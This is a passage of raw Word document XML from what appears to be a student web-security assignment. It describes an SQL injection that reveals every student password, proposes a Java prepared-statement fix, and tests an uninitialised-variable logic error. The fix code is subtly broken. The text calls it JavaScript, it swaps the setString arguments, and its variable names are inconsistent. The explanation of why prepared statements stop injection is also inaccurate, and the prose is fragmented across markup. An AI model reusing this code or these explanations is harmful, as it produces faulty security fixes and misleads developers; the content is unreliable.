      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4BFF95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studentPassword</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4BFF95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CC6EB9B" w:rsidR="4BFF95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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="26B2FB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Credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="26B2FB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33C51476" w:rsidP="7CC6EB9B" w:rsidRDefault="33C51476" w14:paraId="5F81A69F" w14:textId="6971727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CC6EB9B" w:rsidR="691B6C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above scheme, and especially the keyword ALL, will result in all student passwords being displayed and visible to the</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69C3C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attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="083D57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who can use them to access their accounts.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69C3C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other two values (1,</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="71474A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1) were included because, for the attack to work, there must be an equal number </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="78FE69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parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7ABBAB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the two queries (OWASP Testing Guide, Version 4.0, 2011).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44CF2E6C" w:rsidP="7CC6EB9B" w:rsidRDefault="44CF2E6C" w14:paraId="3905D1A0" w14:textId="0119A04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7CC6EB9B" w:rsidR="7ABBABF7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Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44CF2E6C" w:rsidP="7CC6EB9B" w:rsidRDefault="44CF2E6C" w14:paraId="25E8EEF6" w14:textId="1BAB50D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7ABBABF7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Personally, to resolve this issue, the author would choose </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="535E51C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what he considers to be the easiest fix: A prepared statement.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0B550AB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According to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0B550AB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GeeksForGeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0B550AB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, a prepared statement is a SQL statement in Java that has been </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="60B15B8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pre-compiled by the developer (2022). </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4394464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First, an SQL query is compiled independently, after which it is pass</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2931D73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ed as a parameter into the statement. This means that all that is required of the database is to run the query, which the</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="426A7FA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prepared statement holds as a parameter (</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="426A7FA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GeeksForGeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="426A7FA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, 2022). </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7358C2E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Below is a sample of code, written in JavaScript, that </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7358C2E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represents</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7358C2E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the student port</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4EDF5C07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al application</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3CA3940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where the original query was taken from:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AADB250" w:rsidP="7CC6EB9B" w:rsidRDefault="5AADB250" w14:paraId="2D223960" w14:textId="7BA976E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import </w:t>
      </w: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java.sql</w:t>
      </w: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.*;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AADB250" w:rsidP="7CC6EB9B" w:rsidRDefault="5AADB250" w14:paraId="22C5EB9F" w14:textId="3EAF025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public class </w:t>
      </w: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StudentPortal</w:t>
      </w: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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AADB250" w:rsidP="7CC6EB9B" w:rsidRDefault="5AADB250" w14:paraId="6215443B" w14:textId="68F0885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//</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="17B2CACB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Functions for student portal and connection to database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="73840095" w:rsidP="7CC6EB9B" w:rsidRDefault="73840095" w14:paraId="185CC408" w14:textId="0883015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Connection </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="020D1D06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</w:t>
      </w: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atabaseConnection</w:t>
      </w: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</w:t>
      </w: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DriverManager.getConnection</w:t>
      </w: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73840095" w:rsidP="7CC6EB9B" w:rsidRDefault="73840095" w14:paraId="2547625A" w14:textId="072DCC9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6E8E62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String query = “SELECT * FROM Students </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5BA07A1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WHERE EMPLID </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5BA07A1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= ?</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5BA07A1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AND EMAIL </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5BA07A1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= ?</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5BA07A12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”</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0FD7B527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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79B8A0D3" w:rsidP="7CC6EB9B" w:rsidRDefault="79B8A0D3" w14:paraId="6C62317F" w14:textId="39DF9E7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90C095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PreparedStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="490C095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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="434EB4A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myStmt</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="434EB4A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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="73D9281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databaseConnection.prepareStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="73D9281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(query);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77026B36" w:rsidP="7CC6EB9B" w:rsidRDefault="77026B36" w14:paraId="62CA3B88" w14:textId="3F2F479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myStmt.setString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(EMPLID, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77026B36" w:rsidP="7CC6EB9B" w:rsidRDefault="77026B36" w14:paraId="3C9EA383" w14:textId="07C7101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myStmt.setString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(1, email);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77026B36" w:rsidP="7CC6EB9B" w:rsidRDefault="77026B36" w14:paraId="16BCD359" w14:textId="7DD6882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ResultSet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myOutput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= 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myStmt.executeQuery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();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="58EC06F9" w:rsidP="7CC6EB9B" w:rsidRDefault="58EC06F9" w14:paraId="67CC7081" w14:textId="7FD4F85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</w:p>
    <w:p w:rsidR="77026B36" w:rsidP="7CC6EB9B" w:rsidRDefault="77026B36" w14:paraId="5A8E7E47" w14:textId="732EF58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DatabaseConnection.close</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0DBC9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()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AADB250" w:rsidP="7CC6EB9B" w:rsidRDefault="5AADB250" w14:paraId="4629988B" w14:textId="2BE9F8D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B539C2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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5691B053" w:rsidP="7CC6EB9B" w:rsidRDefault="5691B053" w14:paraId="1C109967" w14:textId="3BE494D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42E1BA13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What happens here is that, after connecting to the database, instead of hard</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="440AB497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coding the credentials into the query</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="129C576D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, the developers leave question marks in their place. They then place the query into a prepared statement</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7443FDB4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, to prepare for parameterization. Only after this, they finally pass the student</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="494BFDE6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7CC6EB9B" w:rsidR="7443FDB4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ID and </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3E047DF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email as parameters to the query</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="39232C8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, placing each parameter in its place, and closing the connection. Not having the credentials hardcoded anymore prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="06FA305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SQL injection, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="102EF419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as attackers cannot access parameters in a prepared statement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05AB5A79" w:rsidP="7CC6EB9B" w:rsidRDefault="05AB5A79" w14:paraId="39BB3423" w14:textId="776EC7A9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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="05AB5A7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Test Business Logic and Data Validation (OTG-BUSLOGIC-001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="1D062AE0" w14:textId="12FC04F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</w:pPr>
    </w:p>
    <w:p w:rsidR="58EC06F9" w:rsidP="7CC6EB9B" w:rsidRDefault="58EC06F9" w14:paraId="08F02EBF" w14:textId="57CAD3D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20F7A68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A. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="19C19806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The logic error in the first example </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="44B6A128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lies in the way the variable “x” was initialized. At the very beginning of the code, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7B00AD24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the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5CCBDD08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x is defined like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CCBDD08" w:rsidP="7CC6EB9B" w:rsidRDefault="5CCBDD08" w14:paraId="623D3935" w14:textId="14DA0AB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5CCBDD08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int x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CCBDD08" w:rsidP="7CC6EB9B" w:rsidRDefault="5CCBDD08" w14:paraId="053FC79E" w14:textId="068E36A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5CCBDD08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Therefore, it is given a type, but not a value. Because of this, when we have the equation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39CBD43E" w:rsidP="7CC6EB9B" w:rsidRDefault="39CBD43E" w14:paraId="248D88D0" w14:textId="632AF99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39CBD43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x = x+1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39CBD43E" w:rsidP="7CC6EB9B" w:rsidRDefault="39CBD43E" w14:paraId="15614F4F" w14:textId="42E11F6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7CC6EB9B" w:rsidR="39CBD43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It is impossible to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="39CBD43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actually solve</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="39CBD43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, since the system does not know the value of x. Ev</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3896CE5F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en Eclipse gives us an error, notifying that the variable has not been properly initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4B37CD9E" w:rsidP="7CC6EB9B" w:rsidRDefault="4B37CD9E" w14:paraId="0419081B" w14:textId="5A23AB4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B37CD9E">
        <w:drawing>
          <wp:inline wp14:editId="6A0369BF" wp14:anchorId="56BE2C83">
            <wp:extent cx="4664288" cy="2367913"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="358821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a84c172dd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88" cy="23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7CD9E" w:rsidP="7CC6EB9B" w:rsidRDefault="4B37CD9E" w14:paraId="0D05B9C6" w14:textId="382E36D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B37CD9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 1: Initialization error of x variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4B37CD9E" w:rsidP="7CC6EB9B" w:rsidRDefault="4B37CD9E" w14:paraId="61213763" w14:textId="498E72F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B37CD9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The solution that </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4B37CD9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eclipse</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4B37CD9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> proposes for this is giving the x a value of 0. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EDB9847" w:rsidP="7CC6EB9B" w:rsidRDefault="7EDB9847" w14:paraId="214A39EB" w14:textId="0B5793A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EDB9847">
        <w:drawing>
          <wp:inline wp14:editId="19549380" wp14:anchorId="02DEA630">
            <wp:extent cx="3549832" cy="2121009"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99974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7c843c417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B9847" w:rsidP="7CC6EB9B" w:rsidRDefault="7EDB9847" w14:paraId="5CB03A22" w14:textId="629837F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7EDB9847">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 2: Solution proposed by Eclipse for Code A.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EDB9847" w:rsidP="7CC6EB9B" w:rsidRDefault="7EDB9847" w14:paraId="74EC8E21" w14:textId="379FE0C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7EDB9847">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>While I will certainly test that out, I will also perform another test by gi</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="57772865">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ving x a value of 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A3DDD4D" w:rsidP="7CC6EB9B" w:rsidRDefault="0A3DDD4D" w14:paraId="19B7CBE1" w14:textId="3515C79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A3DDD4D">
        <w:drawing>
          <wp:inline wp14:editId="319D96C0" wp14:anchorId="63F2F700">
            <wp:extent cx="3410143" cy="1852210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="200466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ca629325d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43" cy="18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DDD4D" w:rsidP="7CC6EB9B" w:rsidRDefault="0A3DDD4D" w14:paraId="2F4BD4EC" w14:textId="3F45DF5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0A3DDD4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0460A9AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proposed author’s value for x.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68489442">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="0460A9AF" w:rsidP="7CC6EB9B" w:rsidRDefault="0460A9AF" w14:paraId="1D5D0F95" w14:textId="5955C45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460A9A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#:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="0460A9AF" w:rsidP="7CC6EB9B" w:rsidRDefault="0460A9AF" w14:paraId="309C2A6C" w14:textId="3AA7FEE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460A9AF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0460A9AF" w:rsidP="7CC6EB9B" w:rsidRDefault="0460A9AF" w14:paraId="52878AF1" w14:textId="73DFB0A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460A9A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Results:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="0460A9AF" w:rsidP="7CC6EB9B" w:rsidRDefault="0460A9AF" w14:paraId="05F3554E" w14:textId="3EB9B09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460A9AF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Results:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="0460A9AF" w:rsidP="7CC6EB9B" w:rsidRDefault="0460A9AF" w14:paraId="7626F542" w14:textId="3B7A227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460A9AF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496B5B81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77F21B08" w14:textId="257E1A1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32A3A0A6" w:rsidP="7CC6EB9B" w:rsidRDefault="32A3A0A6" w14:paraId="19A70131" w14:textId="4331697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2A3A0A6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>X=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2B6E7B2C" w:rsidP="7CC6EB9B" w:rsidRDefault="2B6E7B2C" w14:paraId="4356A55A" w14:textId="7EBE1C4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B6E7B2C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>X=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="32A3A0A6" w:rsidP="7CC6EB9B" w:rsidRDefault="32A3A0A6" w14:paraId="31FE3AD6" w14:textId="0DAED0B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2A3A0A6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>X=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="228A147D" w:rsidP="7CC6EB9B" w:rsidRDefault="228A147D" w14:paraId="7E1E6F19" w14:textId="1FD233A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28A147D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pa</w:t>
            </w:r>
            <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7BEBB2C1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="7CC6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="0EAD45CC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3B44ADE9" w14:textId="081CA9CA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0EE5962" w:rsidP="7CC6EB9B" w:rsidRDefault="40EE5962" w14:paraId="40C7570B" w14:textId="7926C0C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0EE5962">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>X=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="72A5A09F" w:rsidP="7CC6EB9B" w:rsidRDefault="72A5A09F" w14:paraId="2E6E49AC" w14:textId="423CA2F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72A5A09F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>X=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3B5F295C" w:rsidP="7CC6EB9B" w:rsidRDefault="3B5F295C" w14:paraId="166226F2" w14:textId="17BC088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5F295C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>X=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3B5F295C" w:rsidP="7CC6EB9B" w:rsidRDefault="3B5F295C" w14:paraId="0D66806B" w14:textId="4C06433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5F295C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  <w:r w:rsidRPr="7CC6EB9B" w:rsidR="06569A8C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r w:rsidRPr="7CC6EB9B" w:rsidR="75481D59">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="58EC06F9" w:rsidP="7CC6EB9B" w:rsidRDefault="58EC06F9" w14:paraId="158CE2C3" w14:textId="56EAEDB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EC06F9" w:rsidP="7CC6EB9B" w:rsidRDefault="58EC06F9" w14:paraId="4C5E1E82" w14:textId="32A4A0B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40EE5962">
        <w:drawing>
          <wp:inline wp14:editId="7D981954" wp14:anchorId="284E7500">
            <wp:extent cx="5943600" cy="2428875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182407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0848704c8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E5962" w:rsidP="7CC6EB9B" w:rsidRDefault="40EE5962" w14:paraId="18E593D9" w14:textId="1741CF9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0EE5962">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Code </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2B57F17F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7CC6EB9B" w:rsidR="40EE5962">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Test Case 1 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2398D970" w:rsidP="7CC6EB9B" w:rsidRDefault="2398D970" w14:paraId="1CF65865" w14:textId="3F3C66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398D970">
        <w:drawing>
          <wp:inline wp14:editId="74E1DF20" wp14:anchorId="17C0AD7B">
            <wp:extent cx="3683189" cy="2387723"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1068976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da69665c7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8D970" w:rsidP="7CC6EB9B" w:rsidRDefault="2398D970" w14:paraId="4F1FB1DF" w14:textId="252908C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398D970">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: Code </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="77862B74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2398D970">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test Case 2 Screen</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="63B7B94A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="122F0836" w:rsidP="7CC6EB9B" w:rsidRDefault="122F0836" w14:paraId="421C38AF" w14:textId="16E3035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122F0836">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As can be seen above, the program passed the tests </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="122F0836">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>with flying colors</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="122F0836">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. However, one m</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="66FF78A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ust be aware that such calculations only make sense from a computing standpoint. In mathematics, the equation x = x +1 doe</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="46410DEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s not have a valid solution. This is because, from a mathematical standpoint, it </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7C7FB6E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">would </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="46410DEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mean</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="46410DEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that a</w:t>
      </w:r>
